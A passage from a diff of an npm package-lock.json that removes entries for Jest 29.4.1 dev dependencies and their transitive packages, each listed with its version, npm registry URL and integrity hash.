"^29.4.1", - "jest-util": "^29.4.1" - } - }, - "jest-get-type": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-get-type/-/jest-get-type-29.2.0.tgz", - "integrity": "sha512-uXNJlg8hKFEnDgFsrCjznB+sTxdkuqiCL6zMgA75qEbAJjJYTs9XPrvDctrEig2GDow22T/LvHgO57iJhXB/UA==", - "dev": true - }, - "jest-haste-map": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-haste-map/-/jest-haste-map-29.4.1.tgz", - "integrity": "sha512-imTjcgfVVTvg02khXL11NNLTx9ZaofbAWhilrMg/G8dIkp+HYCswhxf0xxJwBkfhWb3e8dwbjuWburvxmcr58w==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/graceful-fs": "^4.1.3", - "@types/node": "*", - "anymatch": "^3.0.3", - "fb-watchman": "^2.0.0", - "fsevents": "^2.3.2", - "graceful-fs": "^4.2.9", - "jest-regex-util": "^29.2.0", - "jest-util": "^29.4.1", - "jest-worker": "^29.4.1", - "micromatch": "^4.0.4", - "walker": "^1.0.8" - } - }, - "jest-leak-detector": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-leak-detector/-/jest-leak-detector-29.4.1.tgz", - "integrity": "sha512-akpZv7TPyGMnH2RimOCgy+hPmWZf55EyFUvymQ4LMsQP8xSPlZumCPtXGoDhFNhUE2039RApZkTQDKU79p/FiQ==", - "dev": true, - "requires": { - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - } - }, - "jest-matcher-utils": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-matcher-utils/-/jest-matcher-utils-29.4.1.tgz", - "integrity": "sha512-k5h0u8V4nAEy6lSACepxL/rw78FLDkBnXhZVgFneVpnJONhb2DhZj/Gv4eNe+1XqQ5IhgUcqj745UwH0HJmMnA==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "pretty-format": "^29.4.1" - } - }, - "jest-message-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-message-util/-/jest-message-util-29.4.1.tgz", - "integrity": "sha512-H4/I0cXUaLeCw6FM+i4AwCnOwHRgitdaUFOdm49022YD5nfyr8C/DrbXOBEyJaj+w/y0gGJ57klssOaUiLLQGQ==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.12.13", - "@jest/types": "^29.4.1", - "@types/stack-utils": "^2.0.0", - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "micromatch": "^4.0.4", - "pretty-format": "^29.4.1", - "slash": "^3.0.0", - "stack-utils": "^2.0.3" - } - }, - "jest-mock": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-mock/-/jest-mock-29.4.1.tgz", - "integrity": "sha512-MwA4hQ7zBOcgVCVnsM8TzaFLVUD/pFWTfbkY953Y81L5ret3GFRZtmPmRFAjKQSdCKoJvvqOu6Bvfpqlwwb0dQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "jest-util": "^29.4.1" - } - }, - "jest-pnp-resolver": { - "version": "1.2.3", - "resolved": "https://registry.npmjs.org/jest-pnp-resolver/-/jest-pnp-resolver-1.2.3.tgz", - "integrity": "sha512-+3NpwQEnRoIBtx4fyhblQDPgJI0H1IEIkX7ShLUjPGA7TtUTvI1oiKi3SR4oBR0hQhQR80l4WAe5RrXBwWMA8w==", - "dev": true, - "requires": {} - }, - "jest-regex-util": { - "version": "29.2.0", - "resolved": "https://registry.npmjs.org/jest-regex-util/-/jest-regex-util-29.2.0.tgz", - "integrity": "sha512-6yXn0kg2JXzH30cr2NlThF+70iuO/3irbaB4mh5WyqNIvLLP+B6sFdluO1/1RJmslyh/f9osnefECflHvTbwVA==", - "dev": true - }, - "jest-resolve": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve/-/jest-resolve-29.4.1.tgz", - "integrity": "sha512-j/ZFNV2lm9IJ2wmlq1uYK0Y/1PiyDq9g4HEGsNTNr3viRbJdV+8Lf1SXIiLZXFvyiisu0qUyIXGBnw+OKWkJwQ==", - "dev": true, - "requires": { - "chalk": "^4.0.0", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-pnp-resolver": "^1.2.2", - "jest-util": "^29.4.1", - "jest-validate": "^29.4.1", - "resolve": "^1.20.0", - "resolve.exports": "^2.0.0", - "slash": "^3.0.0" - } - }, - "jest-resolve-dependencies": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-resolve-dependencies/-/jest-resolve-dependencies-29.4.1.tgz", - "integrity": "sha512-Y3QG3M1ncAMxfjbYgtqNXC5B595zmB6e//p/qpA/58JkQXu/IpLDoLeOa8YoYfsSglBKQQzNUqtfGJJT/qLmJg==", - "dev": true, - "requires": { - "jest-regex-util": "^29.2.0", - "jest-snapshot": "^29.4.1" - } - }, - "jest-runner": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runner/-/jest-runner-29.4.1.tgz", - "integrity": "sha512-8d6XXXi7GtHmsHrnaqBKWxjKb166Eyj/ksSaUYdcBK09VbjPwIgWov1VwSmtupCIz8q1Xv4Qkzt/BTo3ZqiCeg==", - "dev": true, - "requires": { - "@jest/console": "^29.4.1", - "@jest/environment": "^29.4.1", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "graceful-fs": "^4.2.9", - "jest-docblock": "^29.2.0", - "jest-environment-node": "^29.4.1", - "jest-haste-map": "^29.4.1", - "jest-leak-detector": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-resolve": "^29.4.1", - "jest-runtime": "^29.4.1", - "jest-util": "^29.4.1", - "jest-watcher": "^29.4.1", - "jest-worker": "^29.4.1", - "p-limit": "^3.1.0", - "source-map-support": "0.5.13" - } - }, - "jest-runtime": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-runtime/-/jest-runtime-29.4.1.tgz", - "integrity": "sha512-UXTMU9uKu2GjYwTtoAw5rn4STxWw/nadOfW7v1sx6LaJYa3V/iymdCLQM6xy3+7C6mY8GfX22vKpgxY171UIoA==", - "dev": true, - "requires": { - "@jest/environment": "^29.4.1", - "@jest/fake-timers": "^29.4.1", - "@jest/globals": "^29.4.1", - "@jest/source-map": "^29.2.0", - "@jest/test-result": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "cjs-module-lexer": "^1.0.0", - "collect-v8-coverage": "^1.0.0", - "glob": "^7.1.3", - "graceful-fs": "^4.2.9", - "jest-haste-map": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-mock": "^29.4.1", - "jest-regex-util": "^29.2.0", - "jest-resolve": "^29.4.1", - "jest-snapshot": "^29.4.1", - "jest-util": "^29.4.1", - "semver": "^7.3.5", - "slash": "^3.0.0", - "strip-bom": "^4.0.0" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-snapshot": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-snapshot/-/jest-snapshot-29.4.1.tgz", - "integrity": "sha512-l4iV8EjGgQWVz3ee/LR9sULDk2pCkqb71bjvlqn+qp90lFwpnulHj4ZBT8nm1hA1C5wowXLc7MGnw321u0tsYA==", - "dev": true, - "requires": { - "@babel/core": "^7.11.6", - "@babel/generator": "^7.7.2", - "@babel/plugin-syntax-jsx": "^7.7.2", - "@babel/plugin-syntax-typescript": "^7.7.2", - "@babel/traverse": "^7.7.2", - "@babel/types": "^7.3.3", - "@jest/expect-utils": "^29.4.1", - "@jest/transform": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/babel__traverse": "^7.0.6", - "@types/prettier": "^2.1.5", - "babel-preset-current-node-syntax": "^1.0.0", - "chalk": "^4.0.0", - "expect": "^29.4.1", - "graceful-fs": "^4.2.9", - "jest-diff": "^29.4.1", - "jest-get-type": "^29.2.0", - "jest-haste-map": "^29.4.1", - "jest-matcher-utils": "^29.4.1", - "jest-message-util": "^29.4.1", - "jest-util": "^29.4.1", - "natural-compare": "^1.4.0", - "pretty-format": "^29.4.1", - "semver": "^7.3.5" - }, - "dependencies": { - "lru-cache": { - "version": "6.0.0", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz", - "integrity": "sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==", - "dev": true, - "requires": { - "yallist": "^4.0.0" - } - }, - "semver": { - "version": "7.5.4", - "resolved": "https://registry.npmjs.org/semver/-/semver-7.5.4.tgz", - "integrity": "sha512-1bCSESV6Pv+i21Hvpxp3Dx+pSD8lIPt8uVjRrxAUt/nbswYc+tK6Y2btiULjd4+fnq15PX+nqQDC7Oft7WkwcA==", - "dev": true, - "requires": { - "lru-cache": "^6.0.0" - } - }, - "yallist": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/yallist/-/yallist-4.0.0.tgz", - "integrity": "sha512-3wdGidZyq5PB084XLES5TpOSRA3wjXAlIWMhum2kRcv/41Sn2emQ0dycQW4uZXLejwKvg6EsvbdlVL+FYEct7A==", - "dev": true - } - } - }, - "jest-util": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-util/-/jest-util-29.4.1.tgz", - "integrity": "sha512-bQy9FPGxVutgpN4VRc0hk6w7Hx/m6L53QxpDreTZgJd9gfx/AV2MjyPde9tGyZRINAUrSv57p2inGBu2dRLmkQ==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "@types/node": "*", - "chalk": "^4.0.0", - "ci-info": "^3.2.0", - "graceful-fs": "^4.2.9", - "picomatch": "^2.2.3" - } - }, - "jest-validate": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-validate/-/jest-validate-29.4.1.tgz", - "integrity": "sha512-qNZXcZQdIQx4SfUB/atWnI4/I2HUvhz8ajOSYUu40CSmf9U5emil8EDHgE7M+3j9/pavtk3knlZBDsgFvv/SWw==", - "dev": true, - "requires": { - "@jest/types": "^29.4.1", - "camelcase": "^6.2.0", - "chalk": "^4.0.0", - "jest-get-type": "^29.2.0", - "leven": "^3.1.0", - "pretty-format": "^29.4.1" - }, - "dependencies": { - "camelcase": { - "version": "6.3.0", - "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-6.3.0.tgz", - "integrity": "sha512-Gmy6FhYlCY7uOElZUSbxo2UCDH8owEk996gkbrpsgGtrJLM3J7jGxl9Ic7Qwwj4ivOE5AWZWRMecDdF7hqGjFA==", - "dev": true - } - } - }, - "jest-watcher": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-watcher/-/jest-watcher-29.4.1.tgz", - "integrity": "sha512-vFOzflGFs27nU6h8dpnVRER3O2rFtL+VMEwnG0H3KLHcllLsU8y9DchSh0AL/Rg5nN1/wSiQ+P4ByMGpuybaVw==", - "dev": true, - "requires": { - "@jest/test-result": "^29.4.1", - "@jest/types": "^29.4.1", - "@types/node": "*", - "ansi-escapes": "^4.2.1", - "chalk": "^4.0.0", - "emittery": "^0.13.1", - "jest-util": "^29.4.1", - "string-length": "^4.0.1" - } - }, - "jest-worker": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/jest-worker/-/jest-worker-29.4.1.tgz", - "integrity": "sha512-O9doU/S1EBe+yp/mstQ0VpPwpv0Clgn68TkNwGxL6/usX/KUW9Arnn4ag8C3jc6qHcXznhsT5Na1liYzAsuAbQ==", - "dev": true, - "requires": { - "@types/node": "*", - "jest-util": "^29.4.1", - "merge-stream": "^2.0.0", - "supports-color": "^8.0.0" - }, - "dependencies": { - "supports-color": { - "version": "8.1.1", - "resolved": "https://registry.npmjs.org/supports-color/-/supports-color-8.1.1.tgz", - "integrity": "sha512-MpUEN2OodtUzxvKQl72cUF7RQ5EiHsGvSsVG0ia9c5RbWGL2CI4C7EpPS8UTBIplnlzZiNuV56w+FuNxy3ty2Q==", - "dev": true, - "requires": { - "has-flag": "^4.0.0" - } - } - } - }, - "js-tokens": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/js-tokens/-/js-tokens-4.0.0.tgz", - "integrity": "sha512-RdJUflcE3cUzKiMqQgsCu06FPu9UdIJO0beYbPhHN4k6apgJtifcoCtT9bcxOpYBtpD2kCM6Sbzg4CausW/PKQ==", - "dev": true - }, - "js-yaml": { - "version": "3.14.1", - "resolved": "https://registry.npmjs.org/js-yaml/-/js-yaml-3.14.1.tgz", - "integrity": "sha512-okMH7OXXJ7YrN9Ok3/SXrnu4iX9yOk+25nqX4imS2npuvTYDmo/QEZoqwZkYaIDk3jVvBOTOIEgEhaLOynBS9g==", - "dev": true, - "requires": { - "argparse": "^1.0.7", - "esprima": "^4.0.0" - } - }, - "jsesc": { - "version": "2.5.2", - "resolved": "https://registry.npmjs.org/jsesc/-/jsesc-2.5.2.tgz", - "integrity": "sha512-OYu7XEzjkCQ3C5Ps3QIZsQfNpqoJyZZA99wd9aWd05NCtC5pWOkShK2mkL6HXQR6/Cy2lbNdPlZBpuQHXE63gA==", - "dev": true - }, - "json-parse-even-better-errors": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/json-parse-even-better-errors/-/json-parse-even-better-errors-2.3.1.tgz", - "integrity": "sha512-xyFwyhro/JEof6Ghe2iz2NcXoj2sloNsWr/XsERDK/oiPCfaNhl5ONfp+jQdAZRQQ0IJWNzH9zIZF7li91kh2w==", - "dev": true - }, - "json5": { - "version": "2.2.3", - "resolved": "https://registry.npmjs.org/json5/-/json5-2.2.3.tgz", - "integrity": "sha512-XmOWe7eyHYH14cLdVPoyg+GOH3rYX++KpzrylJwSW98t3Nk+U8XOl8FWKOgwtzdb8lXGf6zYwDUzeHMWfxasyg==", - "dev": true - }, - "kleur": { - "version": "3.0.3", - "resolved": "https://registry.npmjs.org/kleur/-/kleur-3.0.3.tgz", - "integrity": "sha512-eTIzlVOSUR+JxdDFepEYcBMtZ9Qqdef+rnzWdRZuMbOywu5tO2w2N7rqjoANZ5k9vywhL6Br1VRjUIgTQx4E8w==", - "dev": true - }, - "leven": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/leven/-/leven-3.1.0.tgz", - "integrity": "sha512-qsda+H8jTaUaN/x5vzW2rzc+8Rw4TAQ/4KjB46IwK5VH+IlVeeeje/EoZRpiXvIqjFgK84QffqPztGI3VBLG1A==", - "dev": true - }, - "lines-and-columns": { - "version": "1.2.4", - "resolved": "https://registry.npmjs.org/lines-and-columns/-/lines-and-columns-1.2.4.tgz", - "integrity": "sha512-7ylylesZQ/PV29jhEDl3Ufjo6ZX7gCqJr5F7PKrqc93v7fzSymt1BpwEU8nAUXs8qzzvqhbjhK5QZg6Mt/HkBg==", - "dev": true - }, - "locate-path": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/locate-path/-/locate-path-5.0.0.tgz", - "integrity": "sha512-t7hw9pI+WvuwNJXwk5zVHpyhIqzg2qTlklJOf0mVxGSbe3Fp2VieZcduNYjaLDoy6p9uGpQEGWG87WpMKlNq8g==", - "dev": true, - "requires": { - "p-locate": "^4.1.0" - } - }, - "lru-cache": { - "version": "5.1.1", - "resolved": "https://registry.npmjs.org/lru-cache/-/lru-cache-5.1.1.tgz", - "integrity": "sha512-KpNARQA3Iwv+jTA0utUVVbrh+Jlrr1Fv0e56GGzAFOXN7dk/FviaDW8LHmK52DlcH4WP2n6gI8vN1aesBFgo9w==", - "dev": true, - "requires": { - "yallist": "^3.0.2" - } - }, - "make-dir": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/make-dir/-/make-dir-3.1.0.tgz", - "integrity": "sha512-g3FeP20LNwhALb/6Cz6Dd4F2ngze0jz7tbzrD2wAV+o9FeNHe4rL+yK2md0J/fiSf1sa1ADhXqi5+oVwOM/eGw==", - "dev": true, - "requires": { - "semver": "^6.0.0" - } - }, - "makeerror": { - "version": "1.0.12", - "resolved": "https://registry.npmjs.org/makeerror/-/makeerror-1.0.12.tgz", - "integrity": "sha512-JmqCvUhmt43madlpFzG4BQzG2Z3m6tvQDNKdClZnO3VbIudJYmxsT0FNJMeiB2+JTSlTQTSbU8QdesVmwJcmLg==", - "dev": true, - "requires": { - "tmpl": "1.0.5" - } - }, - "merge-stream": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/merge-stream/-/merge-stream-2.0.0.tgz", - "integrity": "sha512-abv/qOcuPfk3URPfDzmZU1LKmuw8kT+0nIHvKrKgFrwifol/doWcdA4ZqsWQ8ENrFKkd67Mfpo/LovbIUsbt3w==", - "dev": true - }, - "micromatch": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/micromatch/-/micromatch-4.0.5.tgz", - "integrity": "sha512-DMy+ERcEW2q8Z2Po+WNXuw3c5YaUSFjAO5GsJqfEl7UjvtIuFKO6ZrKvcItdy98dwFI2N1tg3zNIdKaQT+aNdA==", - "dev": true, - "requires": { - "braces": "^3.0.2", - "picomatch": "^2.3.1" - } - }, - "mimic-fn": { - "version": "2.1.0", - "resolved": "https://registry.npmjs.org/mimic-fn/-/mimic-fn-2.1.0.tgz", - "integrity": "sha512-OqbOk5oEQeAZ8WXWydlu9HJjz9WVdEIvamMCcXmuqUYjTknH/sqsWvhQ3vgwKFRR1HpjvNBKQ37nbJgYzGqGcg==", - "dev": true - }, - "minimatch": { - "version": "3.1.2", - "resolved": "https://registry.npmjs.org/minimatch/-/minimatch-3.1.2.tgz", - "integrity": "sha512-J7p63hRiAjw1NDEww1W7i37+ByIrOWO5XQQAzZ3VOcL0PNybwpfmV/N05zFAzwQ9USyEcX6t3UO+K5aqBQOIHw==", - "dev": true, - "requires": { - "brace-expansion": "^1.1.7" - } - }, - "ms": { - "version": "2.1.2", - "resolved": "https://registry.npmjs.org/ms/-/ms-2.1.2.tgz", - "integrity": "sha512-sGkPx+VjMtmA6MX27oA4FBFELFCZZ4S4XqeGOXCv68tT+jb3vk/RyaKWP0PTKyWtmLSM0b+adUTEvbs1PEaH2w==", - "dev": true - }, - "natural-compare": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/natural-compare/-/natural-compare-1.4.0.tgz", - "integrity": "sha512-OWND8ei3VtNC9h7V60qff3SVobHr996CTwgxubgyQYEpg290h9J0buyECNNJexkFm5sOajh5G116RYA1c8ZMSw==", - "dev": true - }, - "node-int64": { - "version": "0.4.0", - "resolved": "https://registry.npmjs.org/node-int64/-/node-int64-0.4.0.tgz", - "integrity": "sha512-O5lz91xSOeoXP6DulyHfllpq+Eg00MWitZIbtPfoSEvqIHdl5gfcY6hYzDWnj0qD5tz52PI08u9qUvSVeUBeHw==", - "dev": true - }, - "node-releases": { - "version": "2.0.9", - "resolved": "https://registry.npmjs.org/node-releases/-/node-releases-2.0.9.tgz", - "integrity": "sha512-2xfmOrRkGogbTK9R6Leda0DGiXeY3p2NJpy4+gNCffdUvV6mdEJnaDEic1i3Ec2djAo8jWYoJMR5PB0MSMpxUA==", - "dev": true - }, - "normalize-path": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/normalize-path/-/normalize-path-3.0.0.tgz", - "integrity": "sha512-6eZs5Ls3WtCisHWp9S2GUy8dqkpGi4BVSz3GaqiE6ezub0512ESztXUwUB6C6IKbQkY2Pnb/mD4WYojCRwcwLA==", - "dev": true - }, - "npm-run-path": { - "version": "4.0.1", - "resolved": "https://registry.npmjs.org/npm-run-path/-/npm-run-path-4.0.1.tgz", - "integrity": "sha512-S48WzZW777zhNIrn7gxOlISNAqi9ZC/uQFnRdbeIHhZhCA6UqpkOT8T1G7BvfdgP4Er8gF4sUbaS0i7QvIfCWw==", - "dev": true, - "requires": { - "path-key": "^3.0.0" - } - }, - "once": { - "version": "1.4.0", - "resolved": "https://registry.npmjs.org/once/-/once-1.4.0.tgz", - "integrity": "sha512-lNaJgI+2Q5URQBkccEKHTQOPaXdUxnZZElQTZY0MFUAuaEqe1E+Nyvgdz/aIyNi6Z9MzO5dv1H8n58/GELp3+w==", - "dev": true, - "requires": { - "wrappy": "1" - } - }, - "onetime": { - "version": "5.1.2", - "resolved": "https://registry.npmjs.org/onetime/-/onetime-5.1.2.tgz", - "integrity": "sha512-kbpaSSGJTWdAY5KPVeMOKXSrPtr8C8C7wodJbcsd51jRnmD+GZu8Y0VoU6Dm5Z4vWr0Ig/1NKuWRKf7j5aaYSg==", - "dev": true, - "requires": { - "mimic-fn": "^2.1.0" - } - }, - "p-limit": { - "version": "3.1.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-3.1.0.tgz", - "integrity": "sha512-TYOanM3wGwNGsZN2cVTYPArw454xnXj5qmWF1bEoAc4+cU/ol7GVh7odevjp1FNHduHc3KZMcFduxU5Xc6uJRQ==", - "dev": true, - "requires": { - "yocto-queue": "^0.1.0" - } - }, - "p-locate": { - "version": "4.1.0", - "resolved": "https://registry.npmjs.org/p-locate/-/p-locate-4.1.0.tgz", - "integrity": "sha512-R79ZZ/0wAxKGu3oYMlz8jy/kbhsNrS7SKZ7PxEHBgJ5+F2mtFW2fK2cOtBh1cHYkQsbzFV7I+EoRKe6Yt0oK7A==", - "dev": true, - "requires": { - "p-limit": "^2.2.0" - }, - "dependencies": { - "p-limit": { - "version": "2.3.0", - "resolved": "https://registry.npmjs.org/p-limit/-/p-limit-2.3.0.tgz", - "integrity": "sha512-//88mFWSJx8lxCzwdAABTJL2MyWB12+eIY7MDL2SqLmAkeKU9qxRvWuSyTjm3FUmpBEMuFfckAIqEaVGUDxb6w==", - "dev": true, - "requires": { - "p-try": "^2.0.0" - } - } - } - }, - "p-try": { - "version": "2.2.0", - "resolved": "https://registry.npmjs.org/p-try/-/p-try-2.2.0.tgz", - "integrity": "sha512-R4nPAVTAU0B9D35/Gk3uJf/7XYbQcyohSKdvAxIRSNghFl4e71hVoGnBNQz9cWaXxO2I10KTC+3jMdvvoKw6dQ==", - "dev": true - }, - "parse-json": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/parse-json/-/parse-json-5.2.0.tgz", - "integrity": "sha512-ayCKvm/phCGxOkYRSCM82iDwct8/EonSEgCSxWxD7ve6jHggsFl4fZVQBPRNgQoKiuV/odhFrGzQXZwbifC8Rg==", - "dev": true, - "requires": { - "@babel/code-frame": "^7.0.0", - "error-ex": "^1.3.1", - "json-parse-even-better-errors": "^2.3.0", - "lines-and-columns": "^1.1.6" - } - }, - "path-exists": { - "version": "4.0.0", - "resolved": "https://registry.npmjs.org/path-exists/-/path-exists-4.0.0.tgz", - "integrity": "sha512-ak9Qy5Q7jYb2Wwcey5Fpvg2KoAc/ZIhLSLOSBmRmygPsGwkVVt0fZa0qrtMz+m6tJTAHfZQ8FnmB4MG4LWy7/w==", - "dev": true - }, - "path-is-absolute": { - "version": "1.0.1", - "resolved": "https://registry.npmjs.org/path-is-absolute/-/path-is-absolute-1.0.1.tgz", - "integrity": "sha512-AVbw3UJ2e9bq64vSaS9Am0fje1Pa8pbGqTTsmXfaIiMpnr5DlDhfJOuLj9Sf95ZPVDAUerDfEk88MPmPe7UCQg==", - "dev": true - }, - "path-key": { - "version": "3.1.1", - "resolved": "https://registry.npmjs.org/path-key/-/path-key-3.1.1.tgz", - "integrity": "sha512-ojmeN0qd+y0jszEtoY48r0Peq5dwMEkIlCOu6Q5f41lfkswXuKtYrhgoTpLnyIcHm24Uhqx+5Tqm2InSwLhE6Q==", - "dev": true - }, - "path-parse": { - "version": "1.0.7", - "resolved": "https://registry.npmjs.org/path-parse/-/path-parse-1.0.7.tgz", - "integrity": "sha512-LDJzPVEEEPR+y48z93A0Ed0yXb8pAByGWo/k5YYdYgpY2/2EsOsksJrq7lOHxryrVOn1ejG6oAp8ahvOIQD8sw==", - "dev": true - }, - "picocolors": { - "version": "1.0.0", - "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.0.0.tgz", - "integrity": "sha512-1fygroTLlHu66zi26VoTDv8yRgm0Fccecssto+MhsZ0D/DGW2sm8E8AjW7NU5VVTRt5GxbeZ5qBuJr+HyLYkjQ==", - "dev": true - }, - "picomatch": { - "version": "2.3.1", - "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz", - "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==", - "dev": true - }, - "pirates": { - "version": "4.0.5", - "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.5.tgz", - "integrity": "sha512-8V9+HQPupnaXMA23c5hvl69zXvTwTzyAYasnkb0Tts4XvO4CliqONMOnvlq26rkhLC3nWDFBJf73LU1e1VZLaQ==", - "dev": true - }, - "pkg-dir": { - "version": "4.2.0", - "resolved": "https://registry.npmjs.org/pkg-dir/-/pkg-dir-4.2.0.tgz", - "integrity": "sha512-HRDzbaKjC+AOWVXxAU/x54COGeIv9eb+6CkDSQoNTt4XyWoIJvuPsXizxu/Fr23EiekbtZwmh1IcIG/l/a10GQ==", - "dev": true, - "requires": { - "find-up": "^4.0.0" - } - }, - "pretty-format": { - "version": "29.4.1", - "resolved": "https://registry.npmjs.org/pretty-format/-/pretty-format-29.4.1.tgz", - "integrity": "sha512-dt/Z761JUVsrIKaY215o1xQJBGlSmTx/h4cSqXqjHLnU1+Kt+mavVE7UgqJJO5ukx5HjSswHfmXz4LjS2oIJfg==", - "dev": true, - "requires": { - "@jest/schemas": "^29.4.0", - "ansi-styles": "^5.0.0", - "react-is": "^18.0.0" - }, - "dependencies": { - "ansi-styles": { - "version": "5.2.0", - "resolved": "https://registry.npmjs.org/ansi-styles/-/ansi-styles-5.2.0.tgz", - "integrity": "sha512-Cxwpt2SfTzTtXcfOlzGEee8O+c+MmUgGrNiBcXnuWxuFJHe6a5Hz7qwhwe5OgaSYI0IJvkLqWX1ASG+cJOkEiA==", - "dev": true - } - } - }, - "prompts": { - "version": "2.4.2", - "resolved": "https://registry.npmjs.org/prompts/-/prompts-2.4.2.tgz", - "integrity": "sha512-NxNv/kLguCA7p3jE8oL2aEBsrJWgAakBpgmgK6lpPWV+WuOmY6r2/zbAVnP+T8bQlA0nzHXSJSJW0Hq7ylaD2Q==", - "dev": true, - "requires": { - "kleur": "^3.0.3", - "sisteransi": "^1.0.5" - } - }, - "react-is": { - "version": "18.2.0", - "resolved": "https://registry.npmjs.org/react-is/-/react-is-18.2.0.tgz", - "integrity": "sha512-xWGDIW6x921xtzPkhiULtthJHoJvBbF3q26fzloPCK0hsvxtPVelvftw3zjbHWSkR2km9Z+4uxbDDK/6Zw9B8w==", - "dev": true - }, - "require-directory": { - "version": "2.1.1", - "resolved": "https://registry.npmjs.org/require-directory/-/require-directory-2.1.1.tgz", - "integrity": "sha512-fGxEI7+wsG9xrvdjsrlmL22OMTTiHRwAMroiEeMgq8gzoLC/PQr7RsRDSTLUg/bZAZtF+TVIkHc6/4RIKrui+Q==", - "dev": true - }, - "resolve": { - "version": "1.22.1", - "resolved": "https://registry.npmjs.org/resolve/-/resolve-1.22.1.tgz", - "integrity": "sha512-nBpuuYuY5jFsli/JIs1oldw6fOQCBioohqWZg/2hiaOybXOft4lonv85uDOKXdf8rhyK159cxU5cDcK/NKk8zw==", - "dev": true, - "requires": { - "is-core-module": "^2.9.0", - "path-parse": "^1.0.7", - "supports-preserve-symlinks-flag": "^1.0.0" - } - }, - "resolve-cwd": { - "version": "3.0.0", - "resolved": "https://registry.npmjs.org/resolve-cwd/-/resolve-cwd-3.0.0.tgz", - "integrity": "sha512-OrZaX2Mb+rJCpH/6CpSqt9xFVpN++x01XnN2ie9g6P5/3xelLAkXWVADpdz1IHD/KFfEXyE6V0U01OQ3UO2rEg==", - "dev": true, - "requires": { - "resolve-from": "^5.0.0" - } - }, - "resolve-from": { - "version": "5.0.0", - "resolved": "https://registry.npmjs.org/resolve-from/-/resolve-from-5.0.0.tgz", - "integrity": "sha512-qYg9KP24dD5qka9J47d0aVky0N+b4fTU89LN9iDnjB5waksiC49rvMB0PrUJQGoTmH50XPiqOvAjDfaijGxYZw==", - "dev": true - }, - "resolve.exports": { - "version": "2.0.0", - "resolved": "https://registry.npmjs.org/resolve.exports/-/resolve.exports-2.0.0.tgz", - "integrity": "sha512-6K/gDlqgQscOlg9fSRpWstA8sYe8rbELsSTNpx+3kTrsVCzvSl0zIvRErM7fdl9ERWDsKnrLnwB+Ne89918XOg==", - "dev": true - }, - "semver": { - "version": "6.3.1", - "resolved": 